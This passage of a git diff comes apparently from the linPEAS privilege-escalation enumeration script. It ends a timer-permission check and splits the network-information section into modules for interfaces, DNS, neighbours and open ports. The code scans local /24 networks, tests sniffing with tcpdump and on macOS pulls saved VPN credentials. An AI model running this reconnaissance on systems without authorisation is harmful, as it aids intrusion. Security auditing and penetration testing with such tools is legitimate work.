        findings="${findings}WRITABLE_FILE: Timer target file is writable: $target_file\n"
      fi
    elif [ -w "$timer_file" ]; then
      findings="${findings}WRITABLE_FILE: Timer file is writable\n"
    fi
    # Check for weak permissions (following symlinks)
    if [ "$(stat -L -c %a "$timer_file" 2>/dev/null)" = "777" ]; then
      findings="${findings}WEAK_PERMS: Timer file has 777 permissions\n"
    fi
    # Check for relative paths in Unit directive
    if grep -q "^Unit=[^/]" "$timer_file" 2>/dev/null; then
      findings="${findings}RELATIVE_PATH: Uses relative path in Unit directive\n"
    fi
    # Check for writable executables in Unit directive (following symlinks)
    local unit_path=$(grep -Po '^Unit=*(.*?$)' "$timer_file" 2>/dev/null | cut -d '=' -f2)
    if [ -n "$unit_path" ]; then
      if [ -L "$unit_path" ]; then
        local target_unit=$(readlink -f "$unit_path")
        if [ -w "$target_unit" ]; then
          findings="${findings}WRITABLE_UNIT: Unit target file is writable: $target_unit\n"
        fi
      elif [ -w "$unit_path" ]; then
        findings="${findings}WRITABLE_UNIT: Unit file is writable: $unit_path\n"
      fi
    fi
    # If any findings, print them
    if [ -n "$findings" ]; then
      echo "Potential privilege escalation in timer file: $timer_file"
      echo "$findings" | while read -r finding; do
        [ -n "$finding" ] && echo "  └─ $finding"
      done
    fi
  }
  # List all timers and check for privilege escalation vectors
  print_3title "Active timers:"
  systemctl list-timers --all 2>/dev/null | grep -Ev "(^$|timers listed)" | while read -r line; do
    # Extract timer unit name
    timer_unit=$(echo "$line" | awk '{print $1}')
    if [ -n "$timer_unit" ]; then
      # Check if timer file is writable
      timer_path=$(systemctl show "$timer_unit" -p FragmentPath 2>/dev/null | cut -d= -f2)
      if [ -n "$timer_path" ]; then
        check_timer_file "$timer_path"
      fi
      # Check timer content for privilege escalation vectors
      check_timer_content "$timer_unit"
      # Print the timer line with highlighting
      echo "$line" | sed -${E} "s,$timersG,${SED_GREEN},"
    fi
  done || echo_not_found
  # Check for disabled but available timers
  print_3title "Disabled timers:"
  systemctl list-unit-files --type=timer --state=disabled 2>/dev/null | grep -v "UNIT FILE" | while read -r line; do
    timer_unit=$(echo "$line" | awk '{print $1}')
    if [ -n "$timer_unit" ]; then
      timer_path=$(systemctl show "$timer_unit" -p FragmentPath 2>/dev/null | cut -d= -f2)
      if [ -n "$timer_path" ]; then
        check_timer_file "$timer_path"
      fi
    fi
  done || echo_not_found
  # Check timer files from PSTORAGE_TIMER
  if [ -n "$PSTORAGE_TIMER" ]; then
    print_3title "Additional timer files:"
    printf "%s\n" "$PSTORAGE_TIMER" | while read -r timer_file; do
      if [ -n "$timer_file" ] && [ -e "$timer_file" ]; then
        check_timer_file "$timer_file"
      fi
    done
  fi
  echo ""
 fi
--- a/linPEAS/builder/linpeas_parts/5_network_information.sh
+++ b/linPEAS/builder/linpeas_parts/5_network_information.sh
@ -1,192 +0,0 @@
 ###########################################
 #---------) Network Information (---------#
 ###########################################
 if [ "$MACOS" ]; then
  print_2title "Network Capabilities"
  warn_exec system_profiler SPNetworkDataType
  echo ""
 fi
 #-- NI) Hostname, hosts and DNS
 print_2title "Hostname, hosts and DNS"
 cat /etc/hostname /etc/hosts /etc/resolv.conf 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null
 warn_exec dnsdomainname 2>/dev/null
 echo ""
 #-- NI) /etc/inetd.conf
 if [ "$EXTRA_CHECKS" ]; then
  print_2title "Content of /etc/inetd.conf & /etc/xinetd.conf"
  (cat /etc/inetd.conf /etc/xinetd.conf 2>/dev/null | grep -v "^$" | grep -Ev "\W+\#|^#" 2>/dev/null) || echo_not_found "/etc/inetd.conf"
  echo ""
 fi
 #-- NI) Interfaces
 print_2title "Interfaces"
 cat /etc/networks 2>/dev/null
 (ifconfig || ip a || (cat /proc/net/dev; cat /proc/net/fib_trie; cat /proc/net/fib_trie6)) 2>/dev/null
 echo ""
 #-- NI) Neighbours
 if [ "$EXTRA_CHECKS" ]; then
  print_2title "Networks and neighbours"
  if [ "$MACOS" ]; then
    netstat -rn 2>/dev/null
  else
    (route || ip n || cat /proc/net/route) 2>/dev/null
  fi
  (arp -e || arp -a || cat /proc/net/arp) 2>/dev/null
  echo ""
 fi
 if [ "$MACPEAS" ]; then
  print_2title "Firewall status"
  warn_exec system_profiler SPFirewallDataType
 fi
 #-- NI) Iptables
 if [ "$EXTRA_CHECKS" ]; then
  print_2title "Iptables rules"
  (timeout 1 iptables -L 2>/dev/null; cat /etc/iptables/* | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null) 2>/dev/null || echo_not_found "iptables rules"
  echo ""
 fi
 #-- NI) Ports
 print_2title "Active Ports"
 print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports"
 ( (netstat -punta || ss -nltpu || netstat -anv) | grep -i listen) 2>/dev/null | sed -${E} "s,127.0.[0-9]+.[0-9]+|:::|::1:|0\.0\.0\.0,${SED_RED},g"
 echo ""
 #-- NI) MacOS hardware ports
 if [ "$MACPEAS" ] && [ "$EXTRA_CHECKS" ]; then
  print_2title "Hardware Ports"
  networksetup -listallhardwareports
  echo ""
  print_2title "VLANs"
  networksetup -listVLANs
  echo ""
  print_2title "Wifi Info"
  networksetup -getinfo Wi-Fi
  echo ""
  print_2title "Check Enabled Proxies"
  scutil --proxy
  echo ""
  print_2title "Wifi Proxy URL"
  networksetup -getautoproxyurl Wi-Fi
  echo ""
  print_2title "Wifi Web Proxy"
  networksetup -getwebproxy Wi-Fi
  echo ""
  print_2title "Wifi FTP Proxy"
  networksetup -getftpproxy Wi-Fi
  echo ""
 fi
 #-- NI) tcpdump
 print_2title "Can I sniff with tcpdump?"
 timeout 1 tcpdump >/dev/null 2>&1
 if [ $? -eq 124 ]; then #If 124, then timed out == It worked
    print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sniffing"
    echo "You can sniff with tcpdump!" | sed -${E} "s,.*,${SED_RED},"
 else echo_no
 fi
 echo ""
 #-- NI) Internet access
 if [ "$AUTO_NETWORK_SCAN" ] && [ "$TIMEOUT" ] && [ -f "/bin/bash" ]; then
  print_2title "Internet Access?"
  check_tcp_80 2>/dev/null &
  check_tcp_443 2>/dev/null &
  check_icmp 2>/dev/null &
  check_dns 2>/dev/null &
  wait
  echo ""
 fi
 if [ "$AUTO_NETWORK_SCAN" ]; then
  if ! [ "$FOUND_NC" ] && ! [ "$FOUND_BASH" ]; then
    printf $RED"[-] $SCAN_BAN_BAD\n$NC"
    echo "The network is not going to be scanned..."
  elif ! [ "$(command -v ifconfig)" ] && ! [ "$(command -v ip a)" ]; then
    printf $RED"[-] No ifconfig or ip commands, cannot find local ips\n$NC"
    echo "The network is not going to be scanned..."
  else
    print_2title "Scanning local networks (using /24)"
    if ! [ "$PING" ] && ! [ "$FPING" ]; then
      printf $RED"[-] $DISCOVER_BAN_BAD\n$NC"
    fi
    select_nc
    local_ips=$( (ip a 2>/dev/null || ifconfig) | grep -Eo 'inet[^6]\S+[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | awk '{print $2}' | grep -E "^10\.|^172\.|^192\.168\.|^169\.254\.")
    printf "%s\n" "$local_ips" | while read local_ip; do
      if ! [ -z "$local_ip" ]; then
        print_3title "Discovering hosts in $local_ip/24"
        if [ "$PING" ] || [ "$FPING" ]; then
          discover_network "$local_ip/24" | sed 's/\x1B\[[0-9;]\{1,\}[A-Za-z]//g' | grep -A 256 "Network Discovery" | grep -v "Network Discovery" | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' > $Wfolder/.ips.tmp
        fi
        discovery_port_scan "$local_ip/24" 22 | sed 's/\x1B\[[0-9;]\{1,\}[A-Za-z]//g' | grep -A 256 "Ports going to be scanned" | grep -v "Ports going to be scanned" | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' >> $Wfolder/.ips.tmp
        sort $Wfolder/.ips.tmp | uniq > $Wfolder/.ips
        rm $Wfolder/.ips.tmp 2>/dev/null
        while read disc_ip; do
          me=""
          if [ "$disc_ip" = "$local_ip" ]; then
            me=" (local)"
          fi
          echo "Scanning top ports of ${disc_ip}${me}"
          (tcp_port_scan "$disc_ip" "" | grep -A 1000 "Ports going to be scanned" | grep -v "Ports going to be scanned" | sort | uniq) 2>/dev/null
          echo ""
        done < $Wfolder/.ips
        rm $Wfolder/.ips 2>/dev/null
        echo ""
      fi
    done
    print_3title "Scanning top ports of host.docker.internal"
    (tcp_port_scan "host.docker.internal" "" | grep -A 1000 "Ports going to be scanned" | grep -v "Ports going to be scanned" | sort | uniq) 2>/dev/null
    echo ""
  fi
 fi
 if [ "$MACOS" ]; then
  print_2title "Any MacOS Sharing Service Enabled?"
  rmMgmt=$(netstat -na | grep LISTEN | grep tcp46 | grep "*.3283" | wc -l);
  scrShrng=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.5900" | wc -l);
  flShrng=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep -E "\*.88|\*.445|\*.548" | wc -l);
  rLgn=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.22" | wc -l);
  rAE=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.3031" | wc -l);
  bmM=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.4488" | wc -l);
  printf "\nThe following services are OFF if '0', or ON otherwise:\nScreen Sharing: %s\nFile Sharing: %s\nRemote Login: %s\nRemote Mgmt: %s\nRemote Apple Events: %s\nBack to My Mac: %s\n\n" "$scrShrng" "$flShrng" "$rLgn" "$rmMgmt" "$rAE" "$bmM";
  echo ""
  print_2title "VPN Creds"
  system_profiler SPNetworkLocationDataType | grep -A 5 -B 7 ": Password"  | sed -${E} "s,Password|Authorization Name.*,${SED_RED},"
  echo ""
  if [ "$EXTRA_CHECKS" ]; then
    print_2title "Bluetooth Info"
    warn_exec system_profiler SPBluetoothDataType
    echo ""
    print_2title "Ethernet Info"
    warn_exec system_profiler SPEthernetDataType
    echo ""
    print_2title "USB Info"
    warn_exec system_profiler SPUSBDataType
    echo ""
  fi
 fi
--- a/linPEAS/builder/linpeas_parts/5_network_information/10_Macos_hardware_ports.sh
+++ b/linPEAS/builder/linpeas_parts/5_network_information/10_Macos_hardware_ports.sh
@ -0,0 +1,40 @@
 # Title: Network Information - MacOS hardware ports
 # ID: NT_Macos_hardware_ports
 # Author: Carlos Polop
 # Last Update: 22-08-2023
 # Description: Enumerate macOS hardware ports
 # License: GNU GPL
 # Version: 1.0
 # Functions Used: print_2title
 # Global Variables: $EXTRA_CHECKS, $MACPEAS
 # Initial Functions:
 # Generated Global Variables:
 # Fat linpeas: 0
 # Small linpeas: 0
 if [ "$MACPEAS" ] && [ "$EXTRA_CHECKS" ]; then
  print_2title "Hardware Ports"
  networksetup -listallhardwareports
  echo ""
  print_2title "VLANs"
  networksetup -listVLANs
  echo ""
  print_2title "Wifi Info"
  networksetup -getinfo Wi-Fi
  echo ""
  print_2title "Check Enabled Proxies"
  scutil --proxy
  echo ""
  print_2title "Wifi Proxy URL"
  networksetup -getautoproxyurl Wi-Fi
  echo ""
  print_2title "Wifi Web Proxy"
  networksetup -getwebproxy Wi-Fi
  echo ""
 fi
--- a/linPEAS/builder/linpeas_parts/5_network_information/11_Internet_access.sh
+++ b/linPEAS/builder/linpeas_parts/5_network_information/11_Internet_access.sh
@ -0,0 +1,52 @@
 # Title: Network Information - Internet access
 # ID: NT_Internet_access
 # Author: Carlos Polop
 # Last Update: 22-08-2023
 # Description: Check for internet access
 # License: GNU GPL
 # Version: 1.0
 # Functions Used: check_dns, check_icmp, check_tcp_443, check_tcp_443_bin, check_tcp_80, print_2title, check_external_hostname
 # Global Variables:
 # Initial Functions:
 # Generated Global Variables: $pid4, $pid2, $pid1, $pid3, $$tcp443_bin_status, $NOT_CHECK_EXTERNAL_HOSTNAME, $TIMEOUT_INTERNET_SECONDS
 # Fat linpeas: 0
 # Small linpeas: 0
 print_2title "Internet Access?"
 TIMEOUT_INTERNET_SECONDS=5
 if [ "$SUPERFAST" ]; then
  TIMEOUT_INTERNET_SECONDS=2.5
 fi
 # Run all checks in background
 check_tcp_80 "$TIMEOUT_INTERNET_SECONDS" 2>/dev/null & pid1=$!
 check_tcp_443 "$TIMEOUT_INTERNET_SECONDS" 2>/dev/null & pid2=$!
 check_icmp "$TIMEOUT_INTERNET_SECONDS" 2>/dev/null & pid3=$!
 check_dns "$TIMEOUT_INTERNET_SECONDS" 2>/dev/null & pid4=$!
 # Kill all after 10 seconds
 (sleep $(( $TIMEOUT_INTERNET_SECONDS + 1 )) && kill -9 $pid1 $pid2 $pid3 $pid4 2>/dev/null) &
 check_tcp_443_bin $TIMEOUT_INTERNET_SECONDS 2>/dev/null
 tcp443_bin_status=$?
 wait $pid1 $pid2 $pid3 $pid4 2>/dev/null
 # Wait for all to finish
 wait 2>/dev/null
 if [ "$tcp443_bin_status" -eq 0 ] && \
   [ -z "$SUPERFAST" ] && [ -z "$NOT_CHECK_EXTERNAL_HOSTNAME" ]; then
  echo ""
  print_2title "Is hostname malicious or leaked?"
  print_info "This will check the public IP and hostname in known malicious lists and leaks to find any relevant information about the host."
  check_external_hostname 2>/dev/null
 fi
 echo ""
--- a/linPEAS/builder/linpeas_parts/5_network_information/1_Network_interfaces.sh
+++ b/linPEAS/builder/linpeas_parts/5_network_information/1_Network_interfaces.sh
@ -0,0 +1,76 @@
 # Title: Network Information - Network interfaces
 # ID: NT_Network_interfaces
 # Author: Carlos Polop
 # Last Update: 22-08-2023
 # Description: Check network interfaces
 # License: GNU GPL
 # Version: 1.0
 # Functions Used: print_2title
 # Global Variables:
 # Initial Functions:
 # Generated Global Variables: $iface, $state, $mac, $ip_file, $line
 # Fat linpeas: 0
 # Small linpeas: 1
 # Function to parse network interfaces from /proc/net/dev and other sources
 parse_network_interfaces() {
    # Try to get interfaces from /proc/net/dev
    if [ -f "/proc/net/dev" ]; then
        echo "Network Interfaces from /proc/net/dev:"
        echo "----------------------------------------"
        # Skip header lines and format output
        grep -v "^Inter\|^ face" /proc/net/dev | while read -r line; do
            iface=$(echo "$line" | awk -F: '{print $1}' | tr -d ' ')
            if [ -n "$iface" ]; then
                echo "Interface: $iface"
                # Try to get IP address from /sys/class/net
                if [ -f "/sys/class/net/$iface/address" ]; then
                    mac=$(cat "/sys/class/net/$iface/address" 2>/dev/null)
                    echo "  MAC: $mac"
                fi
                # Try to get IP from /sys/class/net
                if [ -d "/sys/class/net/$iface/ipv4" ]; then
                    for ip_file in /sys/class/net/$iface/ipv4/addr_*; do
                        if [ -f "$ip_file" ]; then
                            ip=$(cat "$ip_file" 2>/dev/null)
                            echo "  IP: $ip"
                        fi
                    done
                fi
                # Get interface state
                if [ -f "/sys/class/net/$iface/operstate" ]; then
                    state=$(cat "/sys/class/net/$iface/operstate" 2>/dev/null)
                    echo "  State: $state"
                fi
                echo ""
            fi
        done
    fi
    # Try to get additional info from /proc/net/fib_trie
    if [ -f "/proc/net/fib_trie" ]; then
        echo "Additional IP Information from fib_trie:"
        echo "----------------------------------------"
        grep -A1 "Main" /proc/net/fib_trie | grep -v "\-\-" | while read -r line; do
            if echo "$line" | grep -q "Main"; then
                echo "Network: $(echo "$line" | awk '{print $2}')"
            elif echo "$line" | grep -q "/"; then
                echo "  IP: $(echo "$line" | awk '{print $2}')"
            fi
        done
    fi
 }
 print_2title "Interfaces"
 cat /etc/networks 2>/dev/null
 # Try standard tools first, then fall back to our custom function
 if command -v ifconfig >/dev/null 2>&1; then
    ifconfig 2>/dev/null
 elif command -v ip >/dev/null 2>&1; then
    ip a 2>/dev/null
 else
    parse_network_interfaces
 fi
 echo ""
--- a/linPEAS/builder/linpeas_parts/5_network_information/2_Hostname_hosts_dns.sh
+++ b/linPEAS/builder/linpeas_parts/5_network_information/2_Hostname_hosts_dns.sh
@ -0,0 +1,107 @@
 # Title: Network Information - Hostname, hosts and DNS
 # ID: NT_Hostname_hosts_dns
 # Author: Carlos Polop
 # Last Update: 22-08-2023
 # Description: Get hostname, hosts and DNS
 # License: GNU GPL
 # Version: 1.0
 # Functions Used: print_2title, warn_exec
 # Global Variables:
 # Initial Functions:
 # Generated Global Variables: $conf, $line
 # Fat linpeas: 0
 # Small linpeas: 1
 # Function to get hostname using multiple methods
 get_hostname_info() {
    print_3title "Hostname Information"
    # Try multiple methods to get hostname
    if command -v hostname >/dev/null 2>&1; then
        echo "System hostname: $(hostname 2>/dev/null)"
        echo "FQDN: $(hostname -f 2>/dev/null)"
    else
        # Fallback methods
        if [ -f "/proc/sys/kernel/hostname" ]; then
            echo "System hostname: $(cat /proc/sys/kernel/hostname 2>/dev/null)"
        fi
        if [ -f "/etc/hostname" ]; then
            echo "Hostname from /etc/hostname: $(cat /etc/hostname 2>/dev/null)"
        fi
    fi
    echo ""
 }
 # Function to get hosts file information
 get_hosts_info() {
    print_3title "Hosts File Information"
    if [ -f "/etc/hosts" ]; then
        echo "Contents of /etc/hosts:"
        grep -v "^#" /etc/hosts 2>/dev/null | grep -v "^$" | while read -r line; do
            echo "  $line"
        done
    fi
    echo ""
 }
 # Function to get DNS information
 get_dns_info() {
    print_3title "DNS Configuration"
    # Get resolv.conf information
    if [ -f "/etc/resolv.conf" ]; then
        echo "DNS Servers (resolv.conf):"
        grep -v "^#" /etc/resolv.conf 2>/dev/null | grep -v "^$" | while read -r line; do
            if echo "$line" | grep -q "nameserver"; then
                echo "  $(echo "$line" | awk '{print $2}')"
            elif echo "$line" | grep -q "search\|domain"; then
                echo "  $line"
            fi
        done
    fi
    # Check for systemd-resolved configuration
    if [ -f "/etc/systemd/resolved.conf" ]; then
        echo -e "\nSystemd-resolved configuration:"
        grep -v "^#" /etc/systemd/resolved.conf 2>/dev/null | grep -v "^$" | while read -r line; do
            echo "  $line"
        done
    fi
    # Check for NetworkManager DNS settings
    if [ -d "/etc/NetworkManager" ]; then
        echo -e "\nNetworkManager DNS settings:"
        find /etc/NetworkManager -type f -name "*.conf" 2>/dev/null | while read -r conf; do
            if grep -q "dns=" "$conf" 2>/dev/null; then
                echo "  From $conf:"
                grep "dns=" "$conf" 2>/dev/null | while read -r line; do
                    echo "    $line"
                done
            fi
        done
    fi
    # Try to get DNS domain name
    echo -e "\nDNS Domain Information:"
    if command -v dnsdomainname >/dev/null 2>&1; then
        warn_exec dnsdomainname 2>/dev/null
    fi
    if command -v domainname >/dev/null 2>&1; then
        warn_exec domainname 2>/dev/null
    fi
    # Check for DNS cache status
    if command -v systemd-resolve >/dev/null 2>&1; then
        echo -e "\nDNS Cache Status (systemd-resolve):"
        systemd-resolve --status 2>/dev/null | grep -A5 "DNS Servers" | grep -v "\-\-" | while read -r line; do
            echo "  $line"
        done
    fi
    echo ""
 }
 print_2title "Hostname, hosts and DNS"
 # Execute all information gathering functions
 get_hostname_info
 get_hosts_info
 get_dns_info
--- a/linPEAS/builder/linpeas_parts/5_network_information/3_Network_neighbours.sh
+++ b/linPEAS/builder/linpeas_parts/5_network_information/3_Network_neighbours.sh
@ -0,0 +1,138 @@
 # Title: Network Information - Network neighbours
 # ID: NT_Network_neighbours
 # Author: Carlos Polop
 # Last Update: 22-08-2023
 # Description: Networks and neighbours
 # License: GNU GPL
 # Version: 1.0
 # Functions Used: print_2title, print_3title
 # Global Variables: $EXTRA_CHECKS, $MACPEAS
 # Initial Functions:
 # Generated Global Variables: $hwtype, $flags, $line, $iface, $dest, $ref, $use, $mask, $metric, $device, $hwaddr
 # Fat linpeas: 0
 # Small linpeas: 0
 # Function to parse routing information from /proc/net/route
 parse_proc_route() {
    print_3title "Routing Table (from /proc/net/route)"
    echo "Destination         Gateway         Genmask         Flags Metric Ref    Use Iface"
    echo "--------------------------------------------------------------------------------"
    # Skip header line and process each route
    tail -n +2 /proc/net/route 2>/dev/null | while read -r line; do
        if [ -n "$line" ]; then
            # Extract fields
            iface=$(echo "$line" | awk '{print $1}')
            dest=$(printf "%d.%d.%d.%d" $(echo "$line" | awk '{printf "0x%s 0x%s 0x%s 0x%s", substr($2,7,2), substr($2,5,2), substr($2,3,2), substr($2,1,2)}'))
            gw=$(printf "%d.%d.%d.%d" $(echo "$line" | awk '{printf "0x%s 0x%s 0x%s 0x%s", substr($3,7,2), substr($3,5,2), substr($3,3,2), substr($3,1,2)}'))
            mask=$(printf "%d.%d.%d.%d" $(echo "$line" | awk '{printf "0x%s 0x%s 0x%s 0x%s", substr($4,7,2), substr($4,5,2), substr($4,3,2), substr($4,1,2)}'))
            flags=$(echo "$line" | awk '{print $5}')
            metric=$(echo "$line" | awk '{print $6}')
            ref=$(echo "$line" | awk '{print $7}')
            use=$(echo "$line" | awk '{print $8}')
            # Print formatted output
            printf "%-18s %-15s %-15s %-6s %-6s %-6s %-6s %s\n" "$dest" "$gw" "$mask" "$flags" "$metric" "$ref" "$use" "$iface"
        fi
    done
    echo ""
 }
 # Function to parse ARP information from /proc/net/arp
 parse_proc_arp() {
    print_3title "ARP Table (from /proc/net/arp)"
    echo "IP address       HW type     Flags     HW address           Mask     Device"
    echo "------------------------------------------------------------------------"
    # Skip header line and process each ARP entry
    tail -n +2 /proc/net/arp 2>/dev/null | while read -r line; do
        if [ -n "$line" ]; then
            ip=$(echo "$line" | awk '{print $1}')
            hwtype=$(echo "$line" | awk '{print $2}')
            flags=$(echo "$line" | awk '{print $3}')
            hwaddr=$(echo "$line" | awk '{print $4}')
            mask=$(echo "$line" | awk '{print $5}')
            device=$(echo "$line" | awk '{print $6}')
            # Print formatted output
            printf "%-15s %-11s %-9s %-18s %-8s %s\n" "$ip" "$hwtype" "$flags" "$hwaddr" "$mask" "$device"
        fi
    done
    echo ""
 }
 # Function to get network neighbors information
 get_network_neighbors() {
    print_2title "Networks and neighbours"
    # Get routing information
    print_3title "Routing Information"
    if [ "$MACPEAS" ]; then
        # macOS specific
        if command -v netstat >/dev/null 2>&1; then
            netstat -rn 2>/dev/null
        else
            echo "No routing information available"
        fi
    else
        # Linux systems
        if command -v ip >/dev/null 2>&1; then
            ip route 2>/dev/null
            echo -e "\nNeighbor table:"
            ip neigh 2>/dev/null
        elif command -v route >/dev/null 2>&1; then
            route -n 2>/dev/null
        elif [ -f "/proc/net/route" ]; then
            parse_proc_route
        else
            echo "No routing information available"
        fi
    fi
    # Get ARP information
    print_3title "ARP Information"
    if command -v arp >/dev/null 2>&1; then
        if [ "$MACPEAS" ]; then
            arp -a 2>/dev/null
        else
            arp -e 2>/dev/null || arp -a 2>/dev/null
        fi
    elif [ -f "/proc/net/arp" ]; then
        parse_proc_arp
    else
        echo "No ARP information available"
    fi
    # Additional neighbor discovery methods
    print_3title "Additional Neighbor Information"
    # Check for IPv6 neighbors if available
    if [ -f "/proc/net/ipv6_neigh" ]; then
        echo "IPv6 Neighbors:"
        cat /proc/net/ipv6_neigh 2>/dev/null | grep -v "^IP" | while read -r line; do
            if [ -n "$line" ]; then
                echo "  $line"
            fi
        done
    fi
    # Try to get LLDP neighbors if available
    if command -v lldpctl >/dev/null 2>&1; then
        echo -e "\nLLDP Neighbors:"
        lldpctl 2>/dev/null | grep -A2 "Interface:" | while read -r line; do
            echo "  $line"
        done
    fi
    # Try to get CDP neighbors if available
    if command -v cdp >/dev/null 2>&1; then
        echo -e "\nCDP Neighbors:"
        cdp 2>/dev/null | grep -v "^$" | while read -r line; do
            echo "  $line"
        done
    fi
    echo ""
 }
 if [ "$EXTRA_CHECKS" ]; then
    get_network_neighbors
 fi
--- a/linPEAS/builder/linpeas_parts/5_network_information/4_Open_ports.sh
+++ b/linPEAS/builder/linpeas_parts/5_network_information/4_Open_ports.sh
@ -0,0 +1,177 @@
 # Title: Network Information - Open ports
 # ID: NT_Open_ports
 # Author: Carlos Polop
 # Last Update: 22-08-2023
 # Description: Enumerate open ports
 # License: GNU GPL
 # Version: 1.0
 # Functions Used: print_2title, print_3title, print_info
 # Global Variables: $E, $SED_RED
 # Initial Functions:
 # Generated Global Variables: $pid_dir, $tx_queue, $pid, $rem_port, $proc_file, $rem_ip, $local_ip, $rx_queue, $proto, $rem_addr, $program, $state, $header_sep, $proc_info, $inode, $header, $line, $local_addr, $local_port
 # Fat linpeas: 0
 # Small linpeas: 1
 # Function to get process info from inode
 get_process_info() {
    local inode=$1
    local pid=""
    local program=""
    if [ -n "$inode" ]; then
        for pid_dir in /proc/[0-9]*/fd; do
            if [ -d "$pid_dir" ]; then
                if ls -l "$pid_dir" 2>/dev/null | grep -q "$inode"; then
                    pid=$(echo "$pid_dir" | awk -F/ '{print $3}')
                    if [ -f "/proc/$pid/cmdline" ]; then
                        program=$(tr '\0' ' ' < "/proc/$pid/cmdline" | cut -d' ' -f1)
                        program=$(basename "$program")
                    fi
                    break
                fi
            fi
        done
    fi
    echo "$pid/$program"
 }
 # Function to parse /proc/net/tcp and /proc/net/udp files
 parse_proc_net_ports() {
    local proto=$1
    local proc_file="/proc/net/$proto"
    local header="Proto  Recv-Q  Send-Q  Local Address          Foreign Address        State       PID/Program name"
    local header_sep="--------------------------------------------------------------------------------"
    if [ -f "$proc_file" ]; then
        print_3title "Active $proto Ports (from /proc/net/$proto)"
        echo "$header"
        echo "$header_sep"
        # Process each connection using a pipe
        tail -n +2 "$proc_file" 2>/dev/null | while IFS= read -r line; do
            [ -z "$line" ] && continue
            # Skip header
            case "$line" in
                *"sl"*) continue ;;
                *) : ;;
            esac
            # Extract fields using awk
            sl=$(echo "$line" | awk '{print $1}')
            local_addr=$(echo "$line" | awk '{print $2}')
            rem_addr=$(echo "$line" | awk '{print $3}')
            st=$(echo "$line" | awk '{print $4}')
            tx_queue=$(echo "$line" | awk '{print $5}')
            rx_queue=$(echo "$line" | awk '{print $6}')
            uid=$(echo "$line" | awk '{print $7}')
            inode=$(echo "$line" | awk '{print $10}')
            # Convert hex IP:port to decimal
            local_ip=$(printf "%d.%d.%d.%d" $(echo "$local_addr" | awk -F: '{printf "0x%s 0x%s 0x%s 0x%s", substr($1,7,2), substr($1,5,2), substr($1,3,2), substr($1,1,2)}'))
            local_port=$(printf "%d" "0x$(echo "$local_addr" | awk -F: '{print $2}')")
            rem_ip=$(printf "%d.%d.%d.%d" $(echo "$rem_addr" | awk -F: '{printf "0x%s 0x%s 0x%s 0x%s", substr($1,7,2), substr($1,5,2), substr($1,3,2), substr($1,1,2)}'))
            rem_port=$(printf "%d" "0x$(echo "$rem_addr" | awk -F: '{print $2}')")
            # Get process information
            proc_info=$(get_process_info "$inode")
            # Get state name
            case $st in
                "01") state="ESTABLISHED" ;;
                "02") state="SYN_SENT" ;;
                "03") state="SYN_RECV" ;;
                "04") state="FIN_WAIT1" ;;
                "05") state="FIN_WAIT2" ;;
                "06") state="TIME_WAIT" ;;
                "07") state="CLOSE" ;;
                "08") state="CLOSE_WAIT" ;;
                "09") state="LAST_ACK" ;;
                "0A") state="LISTEN" ;;
                "0B") state="CLOSING" ;;
                "0C") state="NEW_SYN_RECV" ;;
                *) state="UNKNOWN" ;;
            esac
            # Only show listening ports
            if [ "$state" = "LISTEN" ]; then
                # Format the output
                printf "%-6s %-8s %-8s %-21s %-21s %-12s %s\n" \
                    "$proto" "$rx_queue" "$tx_queue" "$local_ip:$local_port" "$rem_ip:$rem_port" "$state" "$proc_info"
            fi
        done
    fi
    echo ""
 }
 # Function to get open ports information
 get_open_ports() {
    print_2title "Active Ports"
    print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#open-ports"
    # Try standard tools first
    if command -v netstat >/dev/null 2>&1; then
        print_3title "Active Ports (netstat)"
        netstat -punta 2>/dev/null | grep -i listen | sed -${E} "s,127.0.[0-9]+.[0-9]+|:::|::1:|0\.0\.0\.0,${SED_RED},g"
    elif command -v ss >/dev/null 2>&1; then
        print_3title "Active Ports (ss)"
        ss -nltpu 2>/dev/null | grep -i listen | sed -${E} "s,127.0.[0-9]+.[0-9]+|:::|::1:|0\.0\.0\.0,${SED_RED},g"
    else
        # Fallback to parsing /proc/net files
        parse_proc_net_ports "tcp"
        parse_proc_net_ports "udp"
    fi
    # Additional port information
    if [ "$EXTRA_CHECKS" ] || [ "$DEBUG" ]; then
        print_3title "Additional Port Information"
        # Check for listening ports in /proc/net/unix
        if [ -f "/proc/net/unix" ]; then
            echo "Unix Domain Sockets:"
            # Use awk to process the file in one go, avoiding duplicates and empty paths
            awk '$8 != "" && $8 != "@" && $8 != "00000000" {
                inode=$7
                socket=$8
                # Find process using inode
                cmd="find /proc/[0-9]*/fd -ls 2>/dev/null | grep " inode " | head -n1 | awk \"{print \\$11}\" | xargs -r readlink"
                pid=""
                while (cmd | getline pid_dir) {
                    if (pid_dir != "") {
                        split(pid_dir, parts, "/")
                        pid=parts[3]
                        break
                    }
                }
                close(cmd)
                if (pid != "") {
                    cmd="tr \\0 \" \" < /proc/" pid "/cmdline 2>/dev/null | cut -d\" \" -f1 | xargs -r basename"
                    cmd | getline prog
                    close(cmd)
                    if (prog != "") {
                        print "  " socket " (" pid "/" prog ")"
                    } else {
                        print "  " socket " (" pid ")"
                    }
                } else {
                    print "  " socket
                }
            }' /proc/net/unix 2>/dev/null | sort -u
        fi
        # Check for ports in use by systemd
        if command -v systemctl >/dev/null 2>&1; then
            echo -e "\nSystemd Socket Units:"
            systemctl list-sockets 2>/dev/null | while IFS= read -r line; do
                [ -z "$line" ] && continue
                if ! echo "$line" | grep -q "UNIT\|listed"; then
                    echo "  $line"
                fi
            done
        fi
    fi
    echo ""
 }
 get_open_ports
--- a/linPEAS/builder/linpeas_parts/5_network_information/5_Macos_network_capabilities.sh
+++ b/linPEAS/builder/linpeas_parts/5_network_information/5_Macos_network_capabilities.sh
